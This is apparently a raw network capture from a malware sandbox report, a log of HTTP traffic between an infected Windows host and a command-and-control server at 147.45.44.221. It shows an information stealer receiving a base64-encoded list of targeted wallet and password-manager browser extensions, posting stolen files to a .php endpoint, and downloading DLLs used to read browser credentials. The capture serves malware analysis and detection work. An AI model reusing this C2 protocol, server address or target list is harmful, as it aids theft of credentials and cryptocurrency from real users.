                                                                                                                                                    Data Ascii: MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8MHwwfFRlbXBsZXxvb2tqbGJraWlqaW5ocG1uamZmY29mam9uYmZiZ2FvY3wxfDB8MHxHb2J5fGpua2VsZmFuamtlYWRvbmVjYWJlaGFsbWJncGZvZGptfDF8MHwwfFJ
                                                                                                                                                    Oct 21, 2024 08:47:18.325683117 CEST1236INData Raw: 5a 48 42 76 62 57 4e 6a 62 6d 70 69 62 47 31 71 66 44 46 38 4d 48 77 77 66 45 78 6c 59 58 41 67 56 47 56 79 63 6d 45 67 56 32 46 73 62 47 56 30 66 47 46 70 61 6d 4e 69 5a 57 52 76 61 57 70 74 5a 32 35 73 62 57 70 6c 5a 57 64 71 59 57 64 73 62 57
                                                                                                                                                    Data Ascii: ZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY25ma2xrfDF8MHwwfEF1dGhlbnRpY2F0b3J8YmhnaG9hbWFwY2RwYm9ocGhpZ29vb2FkZGlucGt
                                                                                                                                                    Oct 21, 2024 08:47:18.325715065 CEST1236INData Raw: 4d 48 77 77 66 45 39 77 5a 58 4a 68 49 46 64 68 62 47 78 6c 64 48 78 6e 62 32 70 6f 59 32 52 6e 59 33 42 69 63 47 5a 70 5a 32 4e 68 5a 57 70 77 5a 6d 68 6d 5a 57 64 6c 61 32 52 6e 61 57 4a 73 61 33 77 77 66 44 42 38 4d 58 78 55 63 6e 56 7a 64 43
                                                                                                                                                    Data Ascii: MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHxSYWluYm93IFdhbGxldHx
                                                                                                                                                    Oct 21, 2024 08:47:18.325750113 CEST900INData Raw: 62 6e 42 75 61 47 52 74 62 32 35 38 4d 58 77 77 66 44 42 38 52 57 78 73 61 53 41 74 49 46 4e 31 61 53 42 58 59 57 78 73 5a 58 52 38 62 32 4e 71 5a 48 42 74 62 32 46 73 62 47 31 6e 62 57 70 69 59 6d 39 6e 5a 6d 6c 70 59 57 39 6d 63 47 68 69 61 6d
                                                                                                                                                    Data Ascii: bnBuaGRtb258MXwwfDB8RWxsaSAtIFN1aSBXYWxsZXR8b2NqZHBtb2FsbG1nbWpiYm9nZmlpYW9mcGhiamdjaGh8MXwwfDB8VmVub20gV2FsbGV0fG9qZ2dtY2hsZ2huamxhcG1mYm5qaG9sZmpraWlkYmNofDF8MHwwfFB1bHNlIFdhbGxldCBDaHJvbWl1bXxjaW9qb2Nwa2NsZmZsb21iYmNmaWdjaWpqY2JrbWhhZnwxfDB
                                                                                                                                                    Oct 21, 2024 08:47:18.327584028 CEST468OUTPOST /28166bd28a5d19e6.php HTTP/1.1
                                                                                                                                                    Content-Type: multipart/form-data; boundary=----CAEGHIJEHJDHIDHIDAEH
                                                                                                                                                    Host: 147.45.44.221
                                                                                                                                                    Content-Length: 268
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Data Raw: 2d 2d 2d 2d 2d 2d 43 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 33 61 66 34 61 38 35 36 38 31 64 37 39 65 65 66 62 39 65 33 39 31 31 36 39 37 65 31 30 66 30 35 63 65 33 38 34 32 63 61 36 33 31 65 35 62 61 34 37 37 36 33 63 35 62 34 32 36 35 64 63 65 35 38 33 39 37 32 66 37 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 48 2d 2d 0d 0a
                                                                                                                                                    Data Ascii: ------CAEGHIJEHJDHIDHIDAEHContent-Disposition: form-data; name="token"1c3af4a85681d79eefb9e3911697e10f05ce3842ca631e5ba47763c5b4265dce583972f7------CAEGHIJEHJDHIDHIDAEHContent-Disposition: form-data; name="message"fplugins------CAEGHIJEHJDHIDHIDAEH--
                                                                                                                                                    Oct 21, 2024 08:47:18.581100941 CEST335INHTTP/1.1 200 OK
                                                                                                                                                    Date: Mon, 21 Oct 2024 06:47:18 GMT
                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Content-Length: 108
                                                                                                                                                    Keep-Alive: timeout=5, max=96
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38
                                                                                                                                                    Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
                                                                                                                                                    Oct 21, 2024 08:47:18.634628057 CEST201OUTPOST /28166bd28a5d19e6.php HTTP/1.1
                                                                                                                                                    Content-Type: multipart/form-data; boundary=----BGIDBKKKKKFBGDGDHIDB
                                                                                                                                                    Host: 147.45.44.221
                                                                                                                                                    Content-Length: 5859
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Oct 21, 2024 08:47:18.634769917 CEST5859OUTData Raw: 2d 2d 2d 2d 2d 2d 42 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 33 61 66 34
                                                                                                                                                    Data Ascii: ------BGIDBKKKKKFBGDGDHIDBContent-Disposition: form-data; name="token"1c3af4a85681d79eefb9e3911697e10f05ce3842ca631e5ba47763c5b4265dce583972f7------BGIDBKKKKKFBGDGDHIDBContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
                                                                                                                                                    Oct 21, 2024 08:47:18.905272961 CEST202INHTTP/1.1 200 OK
                                                                                                                                                    Date: Mon, 21 Oct 2024 06:47:18 GMT
                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                    Content-Length: 0
                                                                                                                                                    Keep-Alive: timeout=5, max=95
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Oct 21, 2024 08:47:19.715142012 CEST92OUTGET /3538548809da56b2/sqlite3.dll HTTP/1.1
                                                                                                                                                    Host: 147.45.44.221
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Oct 21, 2024 08:47:19.968152046 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                    Date: Mon, 21 Oct 2024 06:47:19 GMT
                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                    Last-Modified: Mon, 05 Sep 2022 12:30:30 GMT
                                                                                                                                                    ETag: "10e436-5e7ed3ec64580"
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Content-Length: 1106998
                                                                                                                                                    Content-Type: application/x-msdos-program
                                                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: *0@< .text%&`P`.data|'@(,@`.rdatapDpFT@`@.bss(`.edata*,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
                                                                                                                                                    Oct 21, 2024 08:47:19.968246937 CEST1236INData Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00
                                                                                                                                                    Data Ascii: #N@B/81s:<R@B/92P @B
                                                                                                                                                    Oct 21, 2024 08:47:19.968281031 CEST1236INData Raw: ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed c7 05 48 67 eb 61 ff ff ff ff 83 c4 1c 89 e8 5b 5e 5f 5d c3 8d b4 26
                                                                                                                                                    Data Ascii: tu.|$\$4$|$\$4$du1Hga[^_]&+C|$\$4$w#t|$\$4$u#u|$D$4$t&up|$D$4$rZ|$D$4$Q
                                                                                                                                                    Oct 21, 2024 08:47:23.473931074 CEST201OUTPOST /28166bd28a5d19e6.php HTTP/1.1
                                                                                                                                                    Content-Type: multipart/form-data; boundary=----HJKJKKKJJJKJKFHJJJJE
                                                                                                                                                    Host: 147.45.44.221
                                                                                                                                                    Content-Length: 4599
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Oct 21, 2024 08:47:23.736129045 CEST202INHTTP/1.1 200 OK
                                                                                                                                                    Date: Mon, 21 Oct 2024 06:47:23 GMT
                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                    Content-Length: 0
                                                                                                                                                    Keep-Alive: timeout=5, max=93
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Oct 21, 2024 08:47:23.825203896 CEST201OUTPOST /28166bd28a5d19e6.php HTTP/1.1
                                                                                                                                                    Content-Type: multipart/form-data; boundary=----IECBGIDAEHCGDGCBKEBG
                                                                                                                                                    Host: 147.45.44.221
                                                                                                                                                    Content-Length: 1451
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Oct 21, 2024 08:47:24.084317923 CEST202INHTTP/1.1 200 OK
                                                                                                                                                    Date: Mon, 21 Oct 2024 06:47:23 GMT
                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                    Content-Length: 0
                                                                                                                                                    Keep-Alive: timeout=5, max=92
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Oct 21, 2024 08:47:24.101871967 CEST563OUTPOST /28166bd28a5d19e6.php HTTP/1.1
                                                                                                                                                    Content-Type: multipart/form-data; boundary=----EBKEHJJDAAAAKECBGHDA
                                                                                                                                                    Host: 147.45.44.221
                                                                                                                                                    Content-Length: 363
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Data Raw: 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 33 61 66 34 61 38 35 36 38 31 64 37 39 65 65 66 62 39 65 33 39 31 31 36 39 37 65 31 30 66 30 35 63 65 33 38 34 32 63 61 36 33 31 65 35 62 61 34 37 37 36 33 63 35 62 34 32 36 35 64 63 65 35 38 33 39 37 32 66 37 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                    Data Ascii: ------EBKEHJJDAAAAKECBGHDAContent-Disposition: form-data; name="token"1c3af4a85681d79eefb9e3911697e10f05ce3842ca631e5ba47763c5b4265dce583972f7------EBKEHJJDAAAAKECBGHDAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EBKEHJJDAAAAKECBGHDAContent-Disposition: form-data; name="file"------EBKEHJJDAAAAKECBGHDA--
                                                                                                                                                    Oct 21, 2024 08:47:24.358093023 CEST202INHTTP/1.1 200 OK
                                                                                                                                                    Date: Mon, 21 Oct 2024 06:47:24 GMT
                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                    Content-Length: 0
                                                                                                                                                    Keep-Alive: timeout=5, max=91
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Oct 21, 2024 08:47:24.731107950 CEST563OUTPOST /28166bd28a5d19e6.php HTTP/1.1
                                                                                                                                                    Content-Type: multipart/form-data; boundary=----EGCFIDAFBFBAKFHJEGIJ
                                                                                                                                                    Host: 147.45.44.221
                                                                                                                                                    Content-Length: 363
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Data Raw: 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 33 61 66 34 61 38 35 36 38 31 64 37 39 65 65 66 62 39 65 33 39 31 31 36 39 37 65 31 30 66 30 35 63 65 33 38 34 32 63 61 36 33 31 65 35 62 61 34 37 37 36 33 63 35 62 34 32 36 35 64 63 65 35 38 33 39 37 32 66 37 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                    Data Ascii: ------EGCFIDAFBFBAKFHJEGIJContent-Disposition: form-data; name="token"1c3af4a85681d79eefb9e3911697e10f05ce3842ca631e5ba47763c5b4265dce583972f7------EGCFIDAFBFBAKFHJEGIJContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EGCFIDAFBFBAKFHJEGIJContent-Disposition: form-data; name="file"------EGCFIDAFBFBAKFHJEGIJ--
                                                                                                                                                    Oct 21, 2024 08:47:24.987186909 CEST202INHTTP/1.1 200 OK
                                                                                                                                                    Date: Mon, 21 Oct 2024 06:47:24 GMT
                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                    Content-Length: 0
                                                                                                                                                    Keep-Alive: timeout=5, max=90
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Oct 21, 2024 08:47:25.752080917 CEST92OUTGET /3538548809da56b2/freebl3.dll HTTP/1.1
                                                                                                                                                    Host: 147.45.44.221
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Oct 21, 2024 08:47:26.005439043 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                    Date: Mon, 21 Oct 2024 06:47:25 GMT
                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                    Last-Modified: Mon, 05 Sep 2022 08:49:08 GMT
                                                                                                                                                    ETag: "a7550-5e7ea271b0900"
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Content-Length: 685392
                                                                                                                                                    Content-Type: application/x-msdos-program
                                                                                                                                                    Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED]
                                                                                                                                                    Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
                                                                                                                                                    Oct 21, 2024 08:47:27.452250004 CEST92OUTGET /3538548809da56b2/mozglue.dll HTTP/1.1
                                                                                                                                                    Host: 147.45.44.221
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Oct 21, 2024 08:47:27.704931021 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                    Date: Mon, 21 Oct 2024 06:47:27 GMT
                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                    Last-Modified: Mon, 05 Sep 2022 08:49:08 GMT
                                                                                                                                                    ETag: "94750-5e7ea271b0900"
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Content-Length: 608080
                                                                                                                                                    Content-Type: application/x-msdos-program
                                                                                                                                                    Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED]
                                                                                                                                                    Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
                                                                                                                                                    Oct 21, 2024 08:47:28.710366964 CEST93OUTGET /3538548809da56b2/msvcp140.dll HTTP/1.1
                                                                                                                                                    Host: 147.45.44.221
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Oct 21, 2024 08:47:28.963341951 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                    Date: Mon, 21 Oct 2024 06:47:28 GMT
                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                    Last-Modified: Mon, 05 Sep 2022 08:49:08 GMT
                                                                                                                                                    ETag: "6dde8-5e7ea271b0900"
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Content-Length: 450024
                                                                                                                                                    Content-Type: application/x-msdos-program
                                                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED]
                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
                                                                                                                                                    Oct 21, 2024 08:47:29.482800961 CEST89OUTGET /3538548809da56b2/nss3.dll HTTP/1.1
                                                                                                                                                    Host: 147.45.44.221
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Oct 21, 2024 08:47:29.735275030 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                    Date: Mon, 21 Oct 2024 06:47:29 GMT
                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                    Last-Modified: Mon, 05 Sep 2022 08:49:08 GMT
                                                                                                                                                    ETag: "1f3950-5e7ea271b0900"
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Content-Length: 2046288
                                                                                                                                                    Content-Type: application/x-msdos-program
                                                                                                                                                    Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED]
                                                                                                                                                    Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
                                                                                                                                                    Oct 21, 2024 08:47:31.288986921 CEST93OUTGET /3538548809da56b2/softokn3.dll HTTP/1.1
                                                                                                                                                    Host: 147.45.44.221
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Oct 21, 2024 08:47:31.542109966 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                    Date: Mon, 21 Oct 2024 06:47:31 GMT
                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                    Last-Modified: Mon, 05 Sep 2022 08:49:08 GMT
                                                                                                                                                    ETag: "3ef50-5e7ea271b0900"
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Content-Length: 257872
